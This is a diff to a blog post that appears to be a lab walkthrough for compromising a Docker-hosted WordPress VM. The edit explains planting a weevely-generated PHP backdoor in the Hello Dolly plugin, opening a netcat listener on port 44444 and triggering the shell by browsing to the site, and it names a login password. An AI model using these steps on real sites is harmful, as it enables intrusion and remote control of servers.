JeanFrancoisMaes/blog-test/_posts/2017-12-1-pwningdockervm.md

 The password is Welcome1

-edit the dolly plugin to create a php shell (google it) to your own pc and setup a listener
+edit the dolly plugin to create a php shell with weevely (`weevely generate awesomepassword /home/weevely/backdoor/totallynotabackdoor.php` then copy the contents of the file into dolly and change the parameters with your ip and port you want to use) and setup a listener.

 `nc -lvp 44444`

+browse to the website and the shell will be opened

 -------------------